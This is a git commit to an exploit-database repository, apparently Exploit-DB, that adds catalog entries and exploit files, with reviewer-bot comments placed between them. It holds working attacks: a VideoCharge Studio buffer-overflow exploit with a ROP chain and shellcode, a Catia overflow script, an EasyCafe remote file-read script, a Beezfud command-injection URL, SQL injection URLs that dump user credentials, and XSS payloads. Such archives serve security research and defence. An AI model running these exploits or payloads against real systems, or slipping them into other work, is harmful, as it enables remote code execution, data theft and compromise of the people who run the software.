DB: 2015-12-27
9 new exploits
This commit is contained in:
parent
a78b7bb472
commit
415f43407d
10 changed files with 368 additions and 0 deletions
|
@ -35334,6 +35334,8 @@ id,file,description,date,author,platform,type,port
|
|||
39072,platforms/win64/dos/39072.txt,"Adobe Flash Sound.setTransform - Use-After-Free",2015-12-21,"Google Security Research",win64,dos,0
|
||||
39073,platforms/cgi/dos/39073.txt,"Seowon Intech WiMAX SWC-9100 Router /cgi-bin/reboot.cgi Unauthenticated Remote Reboot DoS",2014-02-03,"Josue Rojas",cgi,dos,0
|
||||
39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router /cgi-bin/diagnostic.cgi ping_ipaddr Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0
|
||||
39105,platforms/windows/remote/39105.py,"VideoCharge Studio 'CHTTPResponse::GetHttpResponse()' Function Stack Buffer Overflow Vulnerability",2014-02-19,"Julien Ahrens",windows,remote,0
|
||||
39104,platforms/multiple/remote/39104.py,"Dassault Systemes Catia Stack Buffer Overflow Vulnerability",2014-02-19,"Mohamed Shetta",multiple,remote,0
|
||||
39076,platforms/multiple/dos/39076.txt,"Wireshark infer_pkt_encap - Heap-Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0
|
||||
39077,platforms/multiple/dos/39077.txt,"Wireshark AirPDcapDecryptWPABroadcastKey - Heap-Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0
|
||||
39078,platforms/php/webapps/39078.txt,"Web Video Streamer Multiple Security Vulnerabilities",2014-01-22,"Eric Sesterhenn",php,webapps,0
|
||||
|
@ -35351,6 +35353,13 @@ id,file,description,date,author,platform,type,port
|
|||
39090,platforms/php/webapps/39090.php,"WordPress Kiddo Theme Arbitrary File Upload Vulnerability",2014-02-05,"TUNISIAN CYBER",php,webapps,0
|
||||
39091,platforms/php/webapps/39091.pl,"WHMCS 'cart.php' Denial of Service Vulnerability",2014-02-07,Amir,php,webapps,0
|
||||
39092,platforms/php/webapps/39092.pl,"phpBB <= 3.0.8 Remote Denial of Service Vulnerability",2014-02-11,Amir,php,webapps,0
|
||||
39093,platforms/php/webapps/39093.txt,"Beezfud - Remote Code Execution",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
|
||||
39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - (code.php) Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
|
||||
39100,platforms/php/webapps/39100.txt,"WordPress NextGEN Gallery Plugin 'jqueryFileTree.php' Directory Traversal Vulnerability",2014-02-19,"Tom Adams",php,webapps,0
|
||||
39101,platforms/php/webapps/39101.php,"MODx Evogallery Module 'uploadify.php' Arbitrary File Upload Vulnerability",2014-02-18,"TUNISIAN CYBER",php,webapps,0
|
||||
39102,platforms/windows/local/39102..py,"EasyCafe Server <= 2.2.14 Remote File Read",2015-12-26,R-73eN,windows,local,0
|
||||
39106,platforms/asp/webapps/39106.txt,"eshtery CMS 'FileManager.aspx' Local File Disclosure Vulnerability",2014-02-22,peng.deng,asp,webapps,0
|
||||
39107,platforms/php/webapps/39107.txt,"ATutor Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0
|
||||
39108,platforms/php/webapps/39108.txt,"POSH 3.1.x 'addtoapplication.php' SQL Injection Vulnerability",2014-02-26,"Anthony BAUBE",php,webapps,0
|
||||
39109,platforms/php/webapps/39109.txt,"WordPress Relevanssi Plugin 'category_name' Parameter SQL Injection Vulnerability",2014-03-04,anonymous,php,webapps,0
|
||||
39110,platforms/php/webapps/39110.txt,"Cory Jobs Search 'cid' Parameter SQL Injection Vulnerability",2014-03-05,Slotleet,php,webapps,0
|
||||
|
|
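--- a/platforms/asp/webapps/39106.txt
+++ b/platforms/asp/webapps/39106.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/65740/info
+
+eshtery CMS is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
+
+Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
+
+http://www.example.com/[path]/FileManager.aspx?file=E:\web\admin.asp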
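--- a/platforms/multiple/remote/39104.py
+++ b/platforms/multiple/remote/39104.py
@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/65675/info
+
+Catia is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
+
+Catia V5-6R2013 is vulnerable.
+
+#!/usr/bin/env python
+
+import socket
+import struct
+import ctypes
+
+RetAdd="\x90\x90\x90\x90"
+Shell="S" *1000
+buff= "\x00\x01\x00\x30" + "A" * 20 + "AppToBusInitMsg" +"\x00" + "\x00" * 48 + "CATV5_Backbone_Bus" +"\x00" + "\x00"* 49 + "\x00\x00\x00\x00"
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(("192.168.0.3", 55555))
+#s.connect(("192.168.0.5", 55558))
+s.send(struct.pack('>I',len(buff) ))
+s.send(buff)
+buff= "\x02\x00\x00\x00" + RetAdd*3 + "\x00\x00\x00\x00" * 13 + "\x00\x00\x00\x00" * 5 + "CATV5_AllApplications" +"\x00" + "\x00"* 43 +"\x00\x00\x98" + "\x00\x00\x00\x01" +"\x00"*4 +"\x08\x00\x00\x00" + Shell
+s.send(struct.pack('>I',len(buff) ))
+s.send(buff)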
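--- a/platforms/php/webapps/39093.txt
+++ b/platforms/php/webapps/39093.txt
@@ -0,0 +1,27 @@
+================================================================================
+# Beezfud Remote Code Execution
+================================================================================
+# Vendor Homepage: https://github.com/EVA-01/beezfud
+# Date: 23/12/2015
+# Software Link: https://github.com/EVA-01/beezfud/archive/master.zip
+# Author: Ashiyane Digital Security Team
+# Contact: hehsan979@gmail.com
+# Source: http://ehsansec.ir/advisories/beezfud-exec.txt
+================================================================================
+# Vulnerable File : index.php
+
+# PoC :
+
+http://localhost/beezfud/index.php?parameter=;Command;
+
+Vulnerable Parameters : lookback , max , range , latest , earliest
+
+
+Example :
+
+http://localhost/beezfud/index.php?lookback=;echo '<?php phpinfo();
+?>' >info.php;
+
+================================================================================
+# Discovered By : Ehsan Hosseini (EhsanSec.ir)
+================================================================================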
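--- a/platforms/php/webapps/39107.txt
+++ b/platforms/php/webapps/39107.txt
@@ -0,0 +1,83 @@
+source: http://www.securityfocus.com/bid/65744/info
+
+ATutor is prone to multiple cross-site scripting vulnerabilities and a HTML-injection vulnerability.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+ATutor 2.1.1 is vulnerable; other versions may also be affected.
+
+1. During installation: xss and sql insertion:
+
+---<request>---
+POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1
+Host: www.example.com
+(...)
+Content-Length: 191
+
+action=process&step=2&new_version=2.1.1&db_host=localhost&db_port=3306&db_login=root&db_password=superpass&db_name='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&tb_prefix=AT_&submit=Next+%BB+
+---<request>---
+
+
+---<response>---
+<ul><li>Database <b>\'>\"><script>alert(1)</script></b> created successfully.
+---<response>---
+
+--> tb_prefix and new_version parameter are also vulnerable.
+
+
+# ==============================================================
+# 2. XSS
+
+---<request>---
+POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1
+Host: www.example.com
+(...)
+Content-Length: 667
+
+action=process&form_admin_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&form_account_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&step=3&step2%5Bnew_version%5D='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&step2%5Bdb_host%5D=localhost&step2%5Bdb_port%5D=3306&step2%5Bdb_login%5D=root&step2%5Bdb_password%5D=superpass&step2%5Bdb_name%5D=atutor&step2%5Btb_prefix%5D=AT_&smtp=false&admin_username=admin&admin_password=&admin_email=admin%40here.com&site_name=Course+Server&email=admin%40here.com&just_social=0&home_url=&account_username=admin&account_password=&account_email=admin%40here.com&account_fname=admin&account_lname=admin&submit=+Next+%BB
+
+---<request>---
+
+Vulnerable to XSS are also parameters:
+step2%5Bnew_version%5D
+step2%5Bdb_host%5D
+step2%5Bdb_port%5D
+step2%5Bdb_login%5D
+step2%5Bdb_password%5D
+step2%5Bdb_name%5D
+step2%5Btb_prefix%5D
+
+
+# ==============================================================
+# 3. Persistent XSS (from admin)
+
+---<request>---
+POST /k/cms/atutor/ATutor/mods/_standard/forums/admin/forum_add.php HTTP/1.1
+Host: www.example.com
+(...)
+Content-Length: 108
+
+add_forum=true&title='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&description=aaaaaaaaaaaaaa&edit=0&submit=Save
+---<request>---
+
+---<response>---
+<span class="required" title="Required Field">*</span><label
+for="title">Title</label><br />
+<input type="text" name="title" size="40" id="title"
+value="'>"><body/onload=alert(9999)>" />
+</div>
+---<response>---
+
+
+
+# ==============================================================
+# 4. Edit config (from admin user):
+
+---<request>---
+POST /k/cms/atutor/ATutor/admin/config_edit.php HTTP/1.1
+Host: www.example.com
+(...)
+Content-Length: 946
+
+site_name='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&home_url=http%3A%2F%2Fwww.atutorspaces.com&default_language=en&contact_email=admin%40here.com&time_zone=0&session_timeout=20&max_file_size=10485760&max_course_size=104857600&max_course_float=2097152&max_login=5&display_name_format=1&master_list=0&allow_registration=1&allow_browse=1&show_current=1&allow_instructor_registration=1&use_captcha=0&allow_unenroll=1&email_confirmation=0&allow_instructor_requests=1&disable_create=0&email_notification=1&auto_approve_instructors=0&theme_categories=0&user_notes=0&illegal_extentions=exe+asp+php+php3+bat+cgi+pl+com+vbs+reg+pcd+pif+scr+bas+inf+vb+vbe+wsc+wsf+wsh&cache_dir=&cache_life=7200&latex_server=http%3A%2F%2Fwww.atutor.ca%2Fcgi%2Fmimetex.cgi%3F&course_backups=5&sent_msgs_ttl=120&check_version=0&fs_versioning=1&old_enable_mail_queue=0&enable_mail_queue=0&auto_install_languages=0&pretty_url=0&course_dir_name=0&apache_mod_rewrite=0&submit=Save
+---<request>---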
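--- a/platforms/php/webapps/39108.txt
+++ b/platforms/php/webapps/39108.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/65817/info
+
+POSH is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Versions prior to POSH 3.3.0 are vulnerable.
+
+http://www.example.com/portal/addtoapplication.php?pid=0&rssurl=url,nbvariables,defvar%20FROM%20dir_item,dir_cat_item
+%20WHERE%201=0%20UNION%20SELECT%201,2,3,4,5,6,(select%20group_concat(username,':',email,':',md5pass)%20from%20users),8%23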
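--- a/platforms/php/webapps/39109.txt
+++ b/platforms/php/webapps/39109.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/65960/info
+
+Relevanssi plugin for WordPress is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Versions prior to Relevanssi 3.3 are vulnerable.
+
+http://www.example.com/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi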
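Review bot: The PoC URL on the last line of the new file points at `wp-content/plugins/wp-realty/index_ext.php` with a `listing_id` parameter, while the advisory text above it and the files.csv entry for 39109 describe a Relevanssi `category_name` SQL injection, so the body and the catalog title disagree about which plugin and parameter are affected. One of the two should be corrected before this is published; as stored, a defender who builds a WAF or log rule from the catalog title would watch the wrong endpoint. The placeholder `[SQLi` is also left unclosed, whereas the sibling entries in this commit use the `[MySQL Injection]` form.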
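--- a/platforms/php/webapps/39110.txt
+++ b/platforms/php/webapps/39110.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/65969/info
+
+Cory Jobs Search is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Cory Jobs Search 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/coryapps/jobsearch/admincp/city.php?cid=[MySQL Injection]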
55
platforms/windows/local/39102..py
Executable file
55
platforms/windows/local/39102..py
Executable file
|
@ -0,0 +1,55 @@
|
|||
#!/usr/bin/python -w
|
||||
# Title : EasyCafe Server <= 2.2.14 Remote File Read
|
||||
# Date : 25/12/2015
|
||||
# Author : R-73eN
|
||||
# Tested on : Windows 7 Ultimate
|
||||
# Software Link : http://www.tinasoft.com/easycafe/
|
||||
# Download Link: http://www.tinasoft.com/Download/easysetup.exe
|
||||
# Vulnerable Versions : EasyCafe Server <= 2.2.14
|
||||
# EasyCafe Server has a feature to upload file from the server to a client.
|
||||
# And the request is as following. EasyCafe Server sends an UDP request to the client with the file that wants to upload,
|
||||
# Then the client receives the packet and connects to the server on port 831 and sends the directory of the file and receives it.
|
||||
# The problem is that a remote attacker can connect to port 831 and can retrive a file becuase the server doesn't validate the request,
|
||||
# and does not check if it has sent the UDP request which gives us full Read access to the system.
|
||||
#
|
||||
#EDB Note: Code my need some adjusting
|
||||
|
||||
import socket
|
||||
#Banner
|
||||
banner = ""
|
||||
banner += " ___ __ ____ _ _ \n"
|
||||
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
|
||||
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
|
||||
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
|
||||
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
|
||||
print banner
|
||||
|
||||
|
||||
|
||||
IP = "192.168.43.36" # Target IP
|
||||
PORT = 831
|
||||
file_to_read = "C:\\Windows\\System32\\drivers\\etc\\hosts" # File to read
|
||||
|
||||
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((IP, PORT))
|
||||
file_to_read = "\x43" + file_to_read
|
||||
hex_value = ''.join(x.encode('hex') for x in file_to_read)
|
||||
fill = "\x00"
|
||||
end = "\x01\x00\x00\x00\x01"
|
||||
payload = hex_value.decode("hex") + fill * (261 - len(end) - len(file_to_read)) + end
|
||||
s.send(payload)
|
||||
s.settimeout(0)
|
||||
print "[+] Request Send Waiting for Response . . . [+]"
|
||||
|
||||
try:
|
||||
data = s.recv(261) # Get header
|
||||
while data:
|
||||
data = s.recv(2048)
|
||||
print data
|
||||
|
||||
except Exception:
|
||||
print "[+] https://www.infogen.al/ [+]"
|
||||
finally:
|
||||
s.close()
|
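Review bot: The new file is committed as `platforms/windows/local/39102..py` with a doubled dot, and the files.csv row for 39102 carries the same path, so the catalog is internally consistent but this entry breaks the `<id>.<ext>` naming every other file in this commit follows; renaming to `39102.py` in both places keeps any tooling that derives the language from the extension working. The header line `#EDB Note: Code my need some adjusting` should read `#EDB Note: Code may need some adjusting`. The `try`/`except`/`finally` block near the end of the file cannot be checked for indentation from this rendering, so I have not reviewed its structure.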
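--- a/platforms/windows/remote/39105.py
+++ b/platforms/windows/remote/39105.py
@@ -0,0 +1,134 @@
+source: http://www.securityfocus.com/bid/65685/info
+
+VideoCharge Studio is prone to a remote stack-based buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
+
+Successful exploits allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts likely result in denial-of-service conditions.
+
+VideoCharge Studio 2.12.3.685 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/python
+# Exploit Title: VideoCharge Studio v2.12.3.685 cc.dll GetHttpResponse()
+MITM Remote Code Execution Exploit (SafeSEH/ASLR/DEP Bypass)
+# Version: v2.12.3.685
+# Date: 2014-02-18
+# Author: Julien Ahrens (@MrTuxracer)
+# Homepage: http://www.rcesecurity.com
+# Software Link: http://www.videocharge.com
+# Tested on: Win7-GER (DEP enabled)
+#
+# Howto / Notes:
+# Since it's a MITM RCE you need to spoof the DNS Record for
+www.videocharge.com in order to successfully exploit this vulnerability
+#
+
+from socket import *
+from struct import pack
+from time import sleep
+
+host = "192.168.0.1"
+port = 80
+
+s = socket(AF_INET, SOCK_STREAM)
+s.bind((host, port))
+s.listen(1)
+print "\n[+] Listening on %d ..." % port
+
+cl, addr = s.accept()
+print "[+] Connection accepted from %s" % addr[0]
+
+# Thanks Giuseppe D'Amore for the amazing shellcode
+# http://www.exploit-db.com/exploits/28996/
+shellcode =
+("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"+
+"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"+
+"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"+
+"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"+
+"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"+
+"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"+
+"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"+
+"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
+
+junk0 = "\x90" * 1277
+junk1 = "\x90" * 1900
+nops="\x90" * 30
+jmpesp=pack('<L',0x102340e8) * 5 # jmp esp | {PAGE_EXECUTE_READ}
+[cc.dll]
+
+# jump to controlled memory
+eip=pack('<L',0x61b84af1) # {pivot 4124 / 0x101c} # ADD ESP,101C # RETN
+[zlib1.dll]
+
+#
+# ROP registers structure:
+# EBP - VirtualProtect() call
+# ESP - lpAddress
+# EBX - dwSize
+# EDX - flNewProtect
+# ECX - lpflOldProtect
+#
+
+# Craft VirtualProtect() call (0x0080D816) via [DE2D66F9 XOR DEADBEEF]
+and MOV to EBP
+rop = pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
+rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
+rop += pack('<L',0xDE2D66F9) # XOR param 1
+rop += pack('<L',0x10206ac5) # POP EBX # RETN [cc.dll]
+rop += pack('<L',0xDEADBEEF) # XOR param 2
+rop += pack('<L',0x1002fb27) # XOR EDI,EBX # ADD DL,BYTE PTR DS:[EAX] #
+RETN [cc.dll]
+rop += pack('<L',0x101f7572) # MOV EAX,EDI # POP EDI # RETN [cc.dll]
+rop += pack('<L',0xDEADBEEF) # Filler
+rop += pack('<L',0x101fbc62) # XCHG EAX,EBP # RETN [cc.dll]
+
+# Craft VirtualProtect() dwSize in EAX and MOV to EBX
+rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
+rop += pack('<L',0x101f2adc) # ADD EAX,500 # RETN [cc.dll]
+rop += pack('<L',0x1023ccfb) # XCHG EAX,EBX # RETN [cc.dll]
+
+# Craft VirtualProtect() flNewProtect in EAX and MOV to EDX
+rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
+rop += pack('<L',0x102026a1) # ADD EAX,25 # RETN [cc.dll]
+rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
+rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
+rop += pack('<L',0x102026b1) # ADD EAX,3 # RETN [cc.dll]
+rop += pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
+rop += pack('<L',0x61b90402) # MOV EDX,ECX # RETN [zlib1.dll]
+
+# Put writable offset for VirtualProtect() lpflOldProtect to ECX
+rop += pack('<L',0x1020aacf) # POP ECX # RETN [cc.dll]
+rop += pack('<L',0x61B96180) # writable location [zlib1.dll]
+
+# POP a value from the stack after PUSHAD and POP value to ESI
+# as a preparation for the VirtualProtect() call
+rop += pack('<L',0x61b850a4) # POP ESI # RETN [zlib1.dll]
+rop += pack('<L',0x61B96180) # writable location from [zlib1.dll]
+rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
+rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
+
+# Achievement unlocked: PUSHAD
+rop += pack('<L',0x101e93d6) # PUSHAD # RETN [cc.dll]
+rop += pack('<L',0x102340c5) # jmp esp | {PAGE_EXECUTE_READ} [cc.dll]
+
+payload = junk0 + eip + junk1 + rop + jmpesp + nops + shellcode
+
+buffer = "HTTP/1.1 200 OK\r\n"
+buffer += "Date: Sat, 09 Feb 2014 13:33:37 GMT\r\n"
+buffer += "Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with
+Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g\r\n"
+buffer += "X-Powered-By: PHP/5.2.6-1+lenny16\r\n"
+buffer += "Vary: Accept-Encoding\r\n"
+buffer += "Content-Length: 4000\r\n"
+buffer += "Connection: close\r\n"
+buffer += "Content-Type: text/html\r\n\r\n"
+buffer += payload
+buffer += "\r\n"
+
+print cl.recv(1000)
+
+cl.send(buffer)
+
+print "[+] Sending exploit: OK\n"
+
+sleep(3)
+cl.close()
+s.close()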
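Review bot: The file is stored with the hard line-wraps of the securityfocus import, so several statements span two lines — `shellcode =` with its string tuple beginning on the following line, `jmpesp=...` followed by `[cc.dll]` on a line of its own, and the `buffer += "Server: ...` header split before `Suhosin-Patch` — yet, unlike 39102 in the same commit, it carries no EDB note saying so. Suggest prepending `#EDB Note: source text was line-wrapped on import; refer to the original advisory for the exact script` so the entry is not presented as a verbatim reproduction. The 134-line count in the file header matches the wrapped layout, so this is the stored content rather than a rendering artefact.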